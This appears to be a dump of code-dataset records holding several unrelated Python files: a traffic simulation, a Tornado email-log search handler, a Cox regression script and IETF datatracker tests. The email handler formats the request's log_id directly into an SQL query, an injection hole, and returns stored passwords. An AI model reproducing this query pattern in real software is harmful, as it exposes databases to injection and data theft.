[{\"x\":t,\"y\":route.a*(t**4)+route.b*(t**3)+route.c*(t**2)+route.d*t+route.e} for t in divider(SIM_TIME,SIM_NODES)]\r\n\r\ndef from_collection(collection,id):return [x for x in collection if x.id == id][0]\r\n\r\ndef UPDATE_ROUTES(id,curr_obj):\r\n    global ROUTES\r\n    ROUTES[[ROUTES.index(route) for route in ROUTES if route.id == id][0]] = curr_obj\r\n    return None\r\n\r\ndef UPDATE_VALVES(id,curr_obj):\r\n    global VALVES\r\n    VALVES[[VALVES.index(valve) for valve in VALVES if valve.id == id][0]] = curr_obj\r\n    return None\r\n\r\ndef UPDATE_CARS(id,curr_obj):\r\n    global CARS\r\n    CARS[[CARS.index(car) for car in CARS if car.id == id][0]] = curr_obj\r\n    return None\r\n\r\ndef toggle_valve(id):\r\n    valve = from_collection(VALVES,id)\r\n    valve.open = not valve.open\r\n    UPDATE_VALVES(id,valve)\r\n\r\ndef NewRouteChart(route_index,gen):\r\n    xy_chart = pygal.XY(show_y_labels=False,show_x_labels=False)\r\n    xy_chart.title = SIM_TITLE\r\n    route = ROUTES[route_index]; car_positions = []\r\n    for car_id in route.cars:\r\n        car = from_collection(CARS,car_id)\r\n        node = route.nodes[car.node]\r\n        car_positions.append((node[\"x\"],node[\"y\"]))\r\n    xy_chart.add('Cars', car_positions)\r\n    xy_chart.render_to_file(here+\"static%s%s.svg\"%(slash,gen))\r\n\r\nclass Route:\r\n    def __init__(self,a,b,c,d,e):\r\n        global ROUTES\r\n        self.a = a; self.b = b; self.c = c; self.d = d; self.e = e\r\n        self.id = new_id()\r\n        self.nodes = compute_nodes(self)\r\n        self.valves = []\r\n        self.valve_nodes = []\r\n        self.cars = []\r\n        ROUTES.append(self)\r\n\r\n# Add Routes to the Environment\r\nRoute(0.008,0.002,0.029,-0.05,-0.012) # Route 1\r\nRoute(0.028,0.002,-0.029,-0.05,0.012) # Route 2\r\nRoute(0.108,-0.052,-0.129,-0.035,-0.012) # Route 3\r\n\r\ndef random_selection(array):return array[int(random()*len(array))]\r\n\r\ndef select_route():return random_selection(ROUTES)\r\n\r\nclass Valve:\r\n    def __init__(self,node):\r\n        global VALVES\r\n        self.node = node\r\n        self.id = new_id()\r\n        success = False\r\n        # bind valve to route\r\n        while not success:\r\n            self.route = select_route()\r\n            if self.id not in self.route.valves and self.node not in self.route.valve_nodes:\r\n                self.route.valves.append(self.id)\r\n                self.route.valve_nodes.append(self.node)\r\n                success = True\r\n            time.sleep(0.1)\r\n
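        # Persist the chosen binding: write the mutated route object back into the global ROUTES list.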
UPDATE_ROUTES(self.route.id,self.route)\r\n # valve open or closed\r\n self.open = random_selection([True,False])\r\n VALVES.append(self)\r\n\r\n# Add Valves to the Environment\r\nfor valve in xrange(10):\r\n Valve(random_selection(xrange(int(SIM_NODES))))\r\n\r\nclass Car:\r\n def __init__(self):\r\n global CARS\r\n time.sleep(0.1)\r\n self.id = new_id()\r\n # bind car to route\r\n self.route = select_route()\r\n self.route.cars.append(self.id); UPDATE_ROUTES(self.route.id,self.route)\r\n # enter route at next free forward node\r\n self.node = len(CARS)+1\r\n if self.node in self.route.valve_nodes:\r\n self.node+=1\r\n CARS.append(self)\r\n def move(self):\r\n # CAR MOVEMENT FRAMEWORK\r\n # Search for cars at your intended next position on your route\r\n if [car for car in CARS if car.route.id == self.route.id and self.node+1 == car.node]:\r\n # do not advance\r\n pass\r\n else:\r\n # check if my next position is a traffic stop\r\n if self.node+1 in self.route.valve_nodes:\r\n # check if valve open\r\n valve_index = self.route.valve_nodes.index(self.node+1)\r\n valve_id = self.route.valves[valve_index]\r\n valve = from_collection(VALVES,valve_id)\r\n if valve.open:\r\n # skip over traffic node\r\n self.node+=2\r\n else:\r\n # stop at traffic light\r\n pass\r\n else:\r\n # move to next node\r\n self.node+=1\r\n\r\n# Add cars to the Environment\r\nfor car in xrange(100):\r\n Car()\r\n\r\ndef MoveCar(car):\r\n car.move(); UPDATE_CARS(car.id,car)\r\n\r\n# Simulation Framework\r\nfor time_step in xrange(int(SIM_NODES)):\r\n # toggle valves every 20 time_steps\r\n if time_step>0 and time_step%20 == 0:\r\n process = map(toggle_valve,[valve.id for valve in VALVES])\r\n # for every time step, attempt to move cars\r\n process = map(MoveCar,CARS)\r\n # plot route chart\r\n NewRouteChart(0,time_step)\r\n","sub_path":"traffic_game.py","file_name":"traffic_game.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578504480","text":"# -*- coding: UTF-8 -*-\nimport traceback\nfrom log.log import Log\nfrom tornado import gen\nfrom collector.BaseHandler import BaseHandler\nfrom util.sql_format import sql_format_select\nfrom util.DBConnectFactory import sync_pool\nfrom tornado.escape import json_encode, json_decode\nfrom setting.setting import ERROR_CODE\nfrom datetime import datetime\n\n\nclass EmailSendLogSearchHandler(BaseHandler):\n\n @gen.coroutine\n def get(self, *args, **kwargs):\n try:\n log = Log().get_logger(\"server\")\n log_id = self.get_arguments('log_id')\n if not log_id:\n log.error(\"the log_id is null\")\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n sql = \"\"\"\n SELECT \n temp.temp_title,log.send_email,log.recv_email,log.send_time,log.annex_pwd,log.html_pwd\n FROM email_send_log as log\n LEFT JOIN email_template as temp\n ON log.temp_id=temp.temp_id\n WHERE log.log_id=\"{0}\"\n \"\"\".format(log_id[0])\n log.info(sql)\n except Exception:\n log.error(\"the get log detail is error\")\n log.error(log_id)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n try:\n pool = sync_pool()\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n log_detail = cursor.fetchone()\n yield pool.close()\n except Exception:\n log.error(\"get log detail get connection is error\")\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, 
\"status\": ERROR_CODE.get(500)}))\n result = {}\n if log_detail:\n result = {\n \"temp_title\": log_detail[0] if log_detail[0] else None,\n \"send_email\": log_detail[1] if log_detail[1] else None,\n \"recv_email\": log_detail[2] if log_detail[2] else None,\n \"send_time\": log_detail[3].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(log_detail[3], datetime) else\n log_detail[3],\n \"annex_pwd\": log_detail[4] if log_detail[4] else None,\n \"html_pwd\": log_detail[5] if log_detail[5] else None\n }\n return self.write(json_encode(result))\n\n @gen.coroutine\n def post(self, *args, **kwargs):\n # 开始, 截至 收件人 发件人 状态\n log = Log().get_logger(\"server\")\n try:\n email_paras_content = json_decode(self.request.body)\n log.info(\"EmailSendLogSearchHandler post is start\")\n log.info(json_encode(email_paras_content))\n log_id = email_paras_content.get('log_id', None)\n create_time = email_paras_content.get('create_time', None)\n end_time = email_paras_content.get('end_time', None)\n send_status = email_paras_content.get('send_status', None)\n send_email = email_paras_content.get('send_email', None)\n recv_email = email_paras_content.get('recv_email', None)\n current_page = int(email_paras_content.get(\"current_page\", 1))\n if current_page < 1:\n current_page = 1\n page_size = email_paras_content.get(\"page_size\", 30)\n begin = (current_page - 1) * page_size\n sql = sql_format_select(\"email_send_log\", begin=begin, end=page_size,\n big={\"create_time\": create_time} if create_time else None,\n less={\"create_time\": end_time} if end_time else None,\n order_by={\"create_time\": create_time} if create_time else None,\n log_id=log_id, send_status=send_status, send_email=send_email,\n recv_email=recv_email)\n\n log.info(sql)\n except Exception:\n log.error(\"the email send log query is error\")\n log.error(self.request.body)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": ERROR_CODE.get(500)}))\n try:\n pool = sync_pool()\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n datas = cursor.fetchall()\n sql = \"select count(*) from \" + sql.split('from')[-1].replace('\\n', '').split('LIMIT')[0].strip()\n log.info(\"the page query \" + sql)\n with (yield pool.Connection()) as conn:\n with conn.cursor() as cursor:\n yield cursor.execute(sql)\n counts = cursor.fetchone()\n yield pool.close()\n result = {\"email_send_log\": [], \"count\": counts}\n for i in datas:\n result[\"email_send_log\"].append(\n {\n \"log_id\": i[0] if i[0] else None,\n \"temp_id\": i[1] if i[1] else None,\n \"bat_id\": i[2] if i[2] else None,\n \"html_pwd\": i[3] if i[3] else None,\n \"annex_pwd\": i[4] if i[4] else None,\n \"send_email\": i[5] if i[5] else None,\n \"id_card\": i[6] if i[6] else None,\n \"user_name\": i[7] if i[7] else None,\n \"recv_email\": i[8] if i[8] else None,\n \"system\": i[9] if i[9] else None,\n \"create_time\": i[10].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(i[10], datetime) else i[10],\n \"send_time\": i[11].strftime(\"%Y-%m-%d %H:%M:%S\") if isinstance(i[11], datetime) else i[11],\n \"send_status\": i[12],\n \"status_detail\": i[13] if i[13] else None,\n }\n )\n return self.write(json_encode(result))\n except Exception:\n log.error(\"the send log query is error\")\n log.error(self.request.body)\n log.error(traceback.format_exc())\n return self.write(json_encode({\"code\": 500, \"status\": 
ERROR_CODE.get(500)}))\n","sub_path":"collector/email_send_log_collector.py","file_name":"email_send_log_collector.py","file_ext":"py","file_size_in_byte":6368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"163555866","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 12 17:02:54 2018\n\n@author: dhartig\n\"\"\"\n\nfrom lifelines import CoxPHFitter\nimport csv, pandas as pd, numpy as np\n\ntimes = []\nevents = []\nx1 = []\nx2 = []\n\nwith open(\"/opt/school/stat778/hw2/HW2_2018.dat\") as csvin: \n rdr = csv.reader(csvin, delimiter=' ')\n for time, flag, cov1, cov2 in rdr:\n times.append(float(time))\n events.append(int(flag))\n x1.append(float(cov1))\n x2.append(int(cov2))\n \ndf = pd.DataFrame({'time': times, 'censored': events, 'x1': x1, 'x2': x2})\n\ncph = CoxPHFitter()\ncph.fit(df, duration_col='time', event_col='censored')\ncph.print_summary()\nh = cph.predict_log_hazard_relative_to_mean(np.array([[0.5], [0.5]]))\nprint(cph._log_likelihood)\nprint(h)\n\n\n#kmf = KaplanMeierFitter()\n#kmf.fit(times, event_observed = events)\n\n#print(kmf.survival_function_)","sub_path":"hw2/logliketest.py","file_name":"logliketest.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"520038777","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil\n\nimport debug # pyflakes:ignore\n\nfrom pyquery import PyQuery\nfrom StringIO import StringIO\nfrom textwrap import wrap\n\nfrom django.conf import settings\nfrom django.urls import reverse as urlreverse\n\nfrom ietf.doc.factories import DocumentFactory, IndividualRfcFactory, WgRfcFactory\nfrom ietf.doc.models import ( Document, DocAlias, State, DocEvent,\n BallotPositionDocEvent, NewRevisionDocEvent, TelechatDocEvent, WriteupDocEvent )\nfrom ietf.doc.utils import create_ballot_if_not_open\nfrom ietf.doc.views_status_change import default_approval_text\nfrom ietf.group.models import Person\nfrom ietf.iesg.models import TelechatDate\nfrom ietf.utils.test_utils import TestCase, unicontent\nfrom ietf.utils.mail import outbox\nfrom ietf.utils.test_utils import login_testing_unauthorized\n\n\nclass StatusChangeTests(TestCase):\n def test_start_review(self):\n\n url = urlreverse('ietf.doc.views_status_change.start_rfc_status_change')\n login_testing_unauthorized(self, \"secretary\", url)\n\n # normal get should succeed and get a reasonable form\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form select[name=create_in_state]')),1)\n\n ad_strpk = str(Person.objects.get(name='Areað Irector').pk)\n state_strpk = str(State.objects.get(slug='adrev',type__slug='statchg').pk) \n\n # faulty posts\n\n ## Must set a responsible AD\n r = self.client.post(url,dict(document_name=\"bogus\",title=\"Bogus Title\",ad=\"\",create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must set a name\n r = self.client.post(url,dict(document_name=\"\",title=\"Bogus Title\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must not choose a document name that already exists\n r = self.client.post(url,dict(document_name=\"imaginary-mid-review\",title=\"Bogus 
Title\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n ## Must set a title\n r = self.client.post(url,dict(document_name=\"bogus\",title=\"\",ad=ad_strpk,create_in_state=state_strpk,notify='ipu@ietf.org'))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n # successful status change start\n r = self.client.post(url,dict(document_name=\"imaginary-new\",title=\"A new imaginary status change\",ad=ad_strpk,\n create_in_state=state_strpk,notify='ipu@ietf.org',new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"tois\"))\n self.assertEqual(r.status_code, 302)\n status_change = Document.objects.get(name='status-change-imaginary-new') \n self.assertEqual(status_change.get_state('statchg').slug,'adrev')\n self.assertEqual(status_change.rev,u'00')\n self.assertEqual(status_change.ad.name,u'Areað Irector')\n self.assertEqual(status_change.notify,u'ipu@ietf.org')\n self.assertTrue(status_change.relateddocument_set.filter(relationship__slug='tois',target__document__name='draft-ietf-random-thing'))\n\n def test_change_state(self):\n\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.change_state',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form select[name=new_state]')),1)\n \n # faulty post\n r = self.client.post(url,dict(new_state=\"\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form .has-error')) > 0)\n\n # successful change to AD Review\n adrev_pk = str(State.objects.get(slug='adrev',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=adrev_pk,comment='RDNK84ZD'))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state('statchg').slug,'adrev')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('RDNK84ZD'))\n self.assertFalse(doc.active_ballot())\n\n # successful change to Last Call Requested\n messages_before = len(outbox)\n doc.ad = Person.objects.get(user__username='ad')\n doc.save_with_history([DocEvent.objects.create(doc=doc, rev=doc.rev, type=\"changed_document\", by=Person.objects.get(user__username=\"secretary\"), desc=\"Test\")])\n lc_req_pk = str(State.objects.get(slug='lc-req',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=lc_req_pk))\n self.assertEquals(r.status_code, 200)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEquals(doc.get_state('statchg').slug,'lc-req')\n self.assertEquals(len(outbox), messages_before + 1)\n self.assertTrue('Last Call:' in outbox[-1]['Subject'])\n\n # successful change to IESG Evaluation \n iesgeval_pk = str(State.objects.get(slug='iesgeval',type__slug='statchg').pk)\n r = self.client.post(url,dict(new_state=iesgeval_pk,comment='TGmZtEjt'))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state('statchg').slug,'iesgeval')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('TGmZtEjt'))\n self.assertTrue(doc.active_ballot())\n 
self.assertEqual(doc.latest_event(BallotPositionDocEvent, type=\"changed_ballot_position\").pos_id,'yes')\n\n def test_edit_notices(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_doc.edit_notify;status-change',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form input[name=notify]')),1)\n self.assertEqual(doc.notify,q('form input[name=notify]')[0].value)\n\n # change notice list\n newlist = '\"Foo Bar\" '\n r = self.client.post(url,dict(notify=newlist,save_addresses=\"1\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.notify,newlist)\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Notification list changed')) \n\n # Some additional setup so there's something to put in a generated notify list\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n\n # Ask the form to regenerate the list\n r = self.client.post(url,dict(regenerate_addresses=\"1\"))\n self.assertEqual(r.status_code,200)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n # Regenerate does not save!\n self.assertEqual(doc.notify,newlist)\n q = PyQuery(r.content)\n formlist = q('form input[name=notify]')[0].value\n self.assertEqual(None,formlist)\n\n def test_edit_title(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_title',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEquals(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEquals(len(q('input[name=title]')),1)\n\n # change title\n r = self.client.post(url,dict(title='New title'))\n self.assertEquals(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEquals(doc.title,'New title')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Title changed')) \n\n def test_edit_ad(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_ad',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('select[name=ad]')),1)\n\n # change ads\n ad2 = Person.objects.get(name='Ad No2')\n r = self.client.post(url,dict(ad=str(ad2.pk)))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.ad,ad2)\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Shepherding AD changed')) \n\n def test_edit_telechat_date(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_doc.telechat_date;status-change',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get \n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n 
self.assertEqual(len(q('select[name=telechat_date]')),1)\n\n # set a date\n self.assertFalse(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\"))\n telechat_date = TelechatDate.objects.active().order_by('date')[0].date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\").telechat_date,telechat_date)\n\n # move it forward a telechat (this should NOT set the returning item bit)\n telechat_date = TelechatDate.objects.active().order_by('date')[1].date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertFalse(doc.returning_item())\n\n # set the returning item bit without changing the date\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat(),returning_item=\"on\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertTrue(doc.returning_item())\n\n # clear the returning item bit\n r = self.client.post(url,dict(telechat_date=telechat_date.isoformat()))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertFalse(doc.returning_item())\n\n # Take the doc back off any telechat\n r = self.client.post(url,dict(telechat_date=\"\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.latest_event(TelechatDocEvent, \"scheduled_for_telechat\").telechat_date,None)\n\n def test_edit_lc(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.last_call',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"ad\", url)\n\n # additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n doc.ad = Person.objects.get(name='Ad No2')\n doc.save_with_history([DocEvent.objects.create(doc=doc, rev=doc.rev, type=\"changed_document\", by=Person.objects.get(user__username=\"secretary\"), desc=\"Test\")])\n \n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('form.edit-last-call-text')),1)\n\n self.assertTrue( 'RFC9999 from Proposed Standard to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( 'RFC9998 from Informational to Historic' in ''.join(wrap(r.content,2**16)))\n \n # save\n r = self.client.post(url,dict(last_call_text=\"Bogus last call text\",save_last_call_text=\"1\"))\n self.assertEqual(r.status_code, 200)\n\n last_call_event = doc.latest_event(WriteupDocEvent, type=\"changed_last_call_text\")\n self.assertEqual(last_call_event.text,\"Bogus last call text\")\n\n # reset\n r = self.client.post(url,dict(regenerate_last_call_text=\"1\"))\n self.assertEqual(r.status_code,200)\n self.assertTrue( 'RFC9999 from Proposed Standard to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( 'RFC9998 from Informational to Historic' in ''.join(wrap(r.content,2**16)))\n \n # request last call\n messages_before = len(outbox)\n r = 
self.client.post(url,dict(last_call_text='stuff',send_last_call_request='Save+and+Request+Last+Call'))\n self.assertEqual(r.status_code,200)\n self.assertTrue( 'Last call requested' in ''.join(wrap(r.content,2**16)))\n self.assertEqual(len(outbox), messages_before + 1)\n self.assertTrue('Last Call:' in outbox[-1]['Subject'])\n self.assertTrue('Last Call Request has been submitted' in ''.join(wrap(unicode(outbox[-1]),2**16)))\n\n\n def test_approve(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.approve',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"secretary\", url)\n \n # Some additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n create_ballot_if_not_open(None, doc, Person.objects.get(user__username=\"secretary\"), \"statchg\")\n doc.set_state(State.objects.get(slug='appr-pend',type='statchg'))\n\n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('[type=submit]:contains(\"Send announcement\")')), 1)\n # There should be two messages to edit\n self.assertEqual(q('input#id_form-TOTAL_FORMS').val(),'2')\n self.assertTrue( '(rfc9999) to Internet Standard' in ''.join(wrap(r.content,2**16)))\n self.assertTrue( '(rfc9998) to Historic' in ''.join(wrap(r.content,2**16)))\n \n # submit\n messages_before = len(outbox)\n msg0=default_approval_text(doc,doc.relateddocument_set.all()[0])\n msg1=default_approval_text(doc,doc.relateddocument_set.all()[1])\n r = self.client.post(url,{'form-0-announcement_text':msg0,'form-1-announcement_text':msg1,'form-TOTAL_FORMS':'2','form-INITIAL_FORMS':'2','form-MAX_NUM_FORMS':''})\n self.assertEqual(r.status_code, 302)\n\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.get_state_slug(),'appr-sent')\n self.assertFalse(doc.ballot_open(\"statchg\"))\n \n self.assertEqual(len(outbox), messages_before + 2)\n self.assertTrue('Action:' in outbox[-1]['Subject'])\n self.assertTrue('ietf-announce' in outbox[-1]['To'])\n self.assertTrue('rfc-editor' in outbox[-1]['Cc'])\n self.assertTrue('(rfc9998) to Historic' in ''.join(wrap(unicode(outbox[-1])+unicode(outbox[-2]),2**16)))\n self.assertTrue('(rfc9999) to Internet Standard' in ''.join(wrap(unicode(outbox[-1])+unicode(outbox[-2]),2**16)))\n\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('The following approval message was sent')) \n\n def test_edit_relations(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.edit_relations',kwargs=dict(name=doc.name))\n\n login_testing_unauthorized(self, \"secretary\", url)\n \n # Some additional setup\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9999'),relationship_id='tois')\n doc.relateddocument_set.create(target=DocAlias.objects.get(name='rfc9998'),relationship_id='tohist')\n\n # get\n r = self.client.get(url)\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertEqual(len(q('#content [type=submit]:contains(\"Save\")')),1)\n # There should be three rows on the form\n self.assertEqual(len(q('#content .row')),3)\n\n # Try to add a relation to an RFC that doesn't exist\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9997\",\n 
statchg_relation_row_blah=\"tois\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n\n # Try to add a relation leaving the relation type blank\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n\n # Try to add a relation with an unknown relationship type\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"badslug\"))\n self.assertEqual(r.status_code, 200)\n q = PyQuery(r.content)\n self.assertTrue(len(q('form ul.errorlist')) > 0)\n \n # Successful change of relations\n r = self.client.post(url,dict(new_relation_row_blah=\"rfc9999\",\n statchg_relation_row_blah=\"toexp\",\n new_relation_row_foo=\"rfc9998\",\n statchg_relation_row_foo=\"tobcp\",\n new_relation_row_nob=\"rfc14\",\n statchg_relation_row_nob=\"tohist\"))\n self.assertEqual(r.status_code, 302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.relateddocument_set.count(),3)\n def verify_relations(doc,target_name,status):\n target_doc=doc.relateddocument_set.filter(target__name=target_name)\n self.assertTrue(target_doc)\n self.assertEqual(target_doc.count(),1)\n self.assertEqual(target_doc[0].relationship.slug,status)\n verify_relations(doc,'rfc9999','toexp' )\n verify_relations(doc,'rfc9998','tobcp' )\n verify_relations(doc,'rfc14' ,'tohist')\n self.assertTrue(doc.latest_event(DocEvent,type=\"added_comment\").desc.startswith('Affected RFC list changed.')) \n \n def setUp(self):\n IndividualRfcFactory(alias2__name='rfc14',name='draft-was-never-issued',std_level_id='unkn')\n WgRfcFactory(alias2__name='rfc9999',name='draft-ietf-random-thing',std_level_id='ps')\n WgRfcFactory(alias2__name='rfc9998',name='draft-ietf-random-other-thing',std_level_id='inf')\n DocumentFactory(type_id='statchg',name='status-change-imaginary-mid-review',notify='notify@example.org')\n\nclass StatusChangeSubmitTests(TestCase):\n def test_initial_submission(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.submit',kwargs=dict(name=doc.name))\n login_testing_unauthorized(self, \"ad\", url)\n\n # normal get\n r = self.client.get(url)\n self.assertEqual(r.status_code,200)\n q = PyQuery(r.content)\n self.assertTrue(q('textarea')[0].text.strip().startswith(\"Provide a description\"))\n \n # Faulty posts using textbox\n # Right now, nothing to test - we let people put whatever the web browser will let them put into that textbox\n\n # sane post using textbox\n path = os.path.join(settings.STATUS_CHANGE_PATH, '%s-%s.txt' % (doc.canonical_name(), doc.rev))\n self.assertEqual(doc.rev,u'00')\n self.assertFalse(os.path.exists(path))\n r = self.client.post(url,dict(content=\"Some initial review text\\n\",submit_response=\"1\"))\n self.assertEqual(r.status_code,302)\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n self.assertEqual(doc.rev,u'00')\n with open(path) as f:\n self.assertEqual(f.read(),\"Some initial review text\\n\")\n self.assertTrue( \"mid-review-00\" in doc.latest_event(NewRevisionDocEvent).desc)\n\n def test_subsequent_submission(self):\n doc = Document.objects.get(name='status-change-imaginary-mid-review')\n url = urlreverse('ietf.doc.views_status_change.submit',kwargs=dict(name=doc.name))\n login_testing_unauthorized(self, \"ad\", 
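# login_testing_unauthorized first asserts that the view rejects anonymous
# access, then logs the named role in for the requests that follow.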
